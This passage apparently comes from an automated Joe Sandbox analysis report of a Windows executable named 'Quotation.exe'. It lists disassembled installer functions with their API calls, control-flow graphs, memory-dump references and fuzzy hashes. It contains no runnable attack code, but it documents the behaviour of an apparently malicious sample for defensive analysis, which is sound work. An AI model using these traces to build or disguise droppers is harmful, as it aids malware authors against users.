                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                              • CloseClipboard.USER32 ref: 00405A68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {$X
                                                              • API String ID: 590372296-1797619585
                                                              • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                              • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                              • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                              • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                                                              Function 00405C2D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 405c2d-405c53 call 405ef8 512 405c55-405c67 DeleteFileW 509->512 513 405c6c-405c73 509->513 514 405de9-405ded 512->514 515 405c75-405c77 513->515 516 405c86-405c96 call 406521 513->516 517 405d97-405d9c 515->517 518 405c7d-405c80 515->518 524 405ca5-405ca6 call 405e3c 516->524 525 405c98-405ca3 lstrcatW 516->525 517->514 520 405d9e-405da1 517->520 518->516 518->517 522 405da3-405da9 520->522 523 405dab-405db3 call 40687e 520->523 522->514 523->514 533 405db5-405dc9 call 405df0 call 405be5 523->533 527 405cab-405caf 524->527 525->527 529 405cb1-405cb9 527->529 530 405cbb-405cc1 lstrcatW 527->530 529->530 532 405cc6-405ce2 lstrlenW FindFirstFileW 529->532 530->532 534 405ce8-405cf0 532->534 535 405d8c-405d90 532->535 549 405de1-405de4 call 4055a6 533->549 550 405dcb-405dce 533->550 537 405d10-405d24 call 406521 534->537 538 405cf2-405cfa 534->538 535->517 540 405d92 535->540 551 405d26-405d2e 537->551 552 405d3b-405d46 call 405be5 537->552 541 405cfc-405d04 538->541 542 405d6f-405d7f FindNextFileW 538->542 540->517 541->537 545 405d06-405d0e 541->545 542->534 548 405d85-405d86 FindClose 542->548 545->537 545->542 548->535 549->514 550->522 555 405dd0-405ddf call 4055a6 call 4062e1 550->555 551->542 556 405d30-405d39 call 405c2d 551->556 560 405d67-405d6a call 4055a6 552->560 561 405d48-405d4b 552->561 555->514 556->542 560->542 564 405d4d-405d5d call 4055a6 call 4062e1 561->564 565 405d5f-405d65 561->565 564->542 565->542
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405C56
                                                              • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405C9E
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CC1
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CC7
                                                              • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CD7
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                              • FindClose.KERNEL32(00000000), ref: 00405D86
                                                              Strings
                                                              • \*.*, xrefs: 00405C98
                                                              • "C:\Users\user\Desktop\Quotation.exe", xrefs: 00405C36
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                              • API String ID: 2035342205-428933315
                                                              • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                              • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                              • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                              • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                              Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 846 401c48-401c68 call 402d89 * 2 851 401c74-401c78 846->851 852 401c6a-401c71 call 402dab 846->852 853 401c84-401c8a 851->853 854 401c7a-401c81 call 402dab 851->854 852->851 857 401cd8-401d02 call 402dab * 2 FindWindowExW 853->857 858 401c8c-401ca8 call 402d89 * 2 853->858 854->853 869 401d08 857->869 870 401cc8-401cd6 SendMessageW 858->870 871 401caa-401cc6 SendMessageTimeoutW 858->871 872 401d0b-401d0e 869->872 870->869 871->872 873 401d14 872->873 874 402c2f-402c3e 872->874 873->874
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                              • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                              • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                              • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                              Function 0040687E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                              • FindClose.KERNEL32(00000000), ref: 00406895
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsd350B.tmp, xrefs: 0040687E
                                                              • X_B, xrefs: 0040687F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$X_B
                                                              • API String ID: 2295610775-605717521
                                                              • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                              • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                              • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                              • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                              Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                              • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                              • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                              • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                              Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                              Strings
                                                              • C:\Users\user\ethnocentrism\skggene\Egyptians218, xrefs: 0040226E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\ethnocentrism\skggene\Egyptians218
                                                              • API String ID: 542301482-4259118363
                                                              • Opcode ID: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                              • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                              • Opcode Fuzzy Hash: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                              • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                              Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                              • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                              • Opcode Fuzzy Hash: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                              • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                              Function 00403FA1 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 208 403fd0-403fdd SetWindowPos 205->208 209 403fe3-403fea 205->209 211 4041cd-4041d2 call 4044ec 206->211 212 40418f-404192 206->212 207->206 208->209 214 403fec-404006 ShowWindow 209->214 215 40402e-404034 209->215 220 4041d7-4041f2 211->220 217 404194-40419f call 401389 212->217 218 4041c5-4041c7 212->218 221 404107-404115 call 404507 214->221 222 40400c-40401f GetWindowLongW 214->222 223 404036-404048 DestroyWindow 215->223 224 40404d-404050 215->224 217->218 237 4041a1-4041c0 SendMessageW 217->237 218->211 219 40446d 218->219 232 40446f-404476 219->232 229 4041f4-4041f6 call 40140b 220->229 230 4041fb-404201 220->230 221->232 222->221 231 404025-404028 ShowWindow 222->231 233 40444a-404450 223->233 235 404052-40405e SetWindowLongW 224->235 236 404063-404069 224->236 229->230 241 404207-404212 230->241 242 40442b-404444 DestroyWindow EndDialog 230->242 231->215 233->219 240 404452-404458 233->240 235->232 236->221 243 40406f-40407e GetDlgItem 236->243 237->232 240->219 244 40445a-404463 ShowWindow 240->244 241->242 245 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 241->245 242->233 246 404080-404097 SendMessageW IsWindowEnabled 243->246 247 40409d-4040a0 243->247 244->219 274 404267-40426c 245->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 245->275 246->219 246->247 248 4040a2-4040a3 247->248 249 4040a5-4040a8 247->249 251 4040d3-4040d8 call 404479 248->251 252 4040b6-4040bb 249->252 253 4040aa-4040b0 249->253 251->221 255 4040f1-404101 SendMessageW 252->255 257 4040bd-4040c3 252->257 253->255 256 4040b2-4040b4 253->256 255->221 256->251 260 4040c5-4040cb call 40140b 257->260 261 4040da-4040e3 call 40140b 257->261 272 4040d1 260->272 261->221 270 4040e5-4040ef 261->270 270->272 272->251 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->220 294 404340-404342 283->294 294->220 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->233 299 404385-4043b2 CreateDialogParamW 296->299 297->219 298 40435a-404360 297->298 298->220 300 404366 298->300 299->233 301 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404411-404424 ShowWindow call 4044ec 301->306 308 404429 306->308 308->233
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                              • ShowWindow.USER32(?), ref: 00403FFD
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                              • ShowWindow.USER32(?,00000004), ref: 00404028
                                                              • DestroyWindow.USER32 ref: 0040403C
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                              • GetDlgItem.USER32(?,?), ref: 00404074
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                              • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                              • GetDlgItem.USER32(?,?), ref: 0040413A
                                                              • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                              • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                              • ShowWindow.USER32(00000000,?), ref: 00404276
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                              • EnableWindow.USER32(?,?), ref: 004042A3
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                              • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                              • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                              • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                              • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: X
                                                              • API String ID: 121052019-529171957
                                                              • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                              • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                              • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                              • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
                                                              Function 00403BF3 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 321 403c79-403ca2 call 403ec9 call 405ef8 312->321 317 403c58-403c69 call 4063ef 313->317 318 403c6e-403c74 lstrcatW 313->318 317->318 318->321 327 403d34-403d3c call 405ef8 321->327 328 403ca8-403cad 321->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403cdb call 4063ef 328->329 329->327 339 403cdd-403ce1 329->339 337 403df0-403df8 call 40140b 334->337 338 403d71-403da1 RegisterClassW 334->338 335->334 352 403e02-403e0d call 403ec9 337->352 353 403dfa-403dfd 337->353 340 403da7-403deb SystemParametersInfoW CreateWindowExW 338->340 341 403ebf 338->341 343 403cf3-403cff lstrlenW 339->343 344 403ce3-403cf0 call 405e1d 339->344 340->337 346 403ec1-403ec8 341->346 347 403d01-403d0f lstrcmpiW 343->347 348 403d27-403d2f call 405df0 call 406521 343->348 344->343 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 355->348 356->348 356->355 370 403e39-403e4b GetClassInfoW 362->370 371 403e2f-403e34 call 4068a5 362->371 366 403e9c-403e9e 363->366 368 403ea0-403ea6 366->368 369 403eb8-403eba call 40140b 366->369 368->353 374 403eac-403eb3 call 40140b 368->374 369->341 372 403e63-403e86 DialogBoxParamW call 40140b 370->372 373 403e4d-403e5d GetClassInfoW RegisterClassW 370->373 371->370 379 403e8b-403e94 call 403b43 372->379 373->372 374->353 379->346
                                                              APIs
                                                                • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                              • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Quotation.exe",00008001), ref: 00403C74
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\ethnocentrism\skggene\Egyptians218,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403CF4
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\ethnocentrism\skggene\Egyptians218,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\ethnocentrism\skggene\Egyptians218), ref: 00403D5B
                                                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                              • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                              • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                              • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
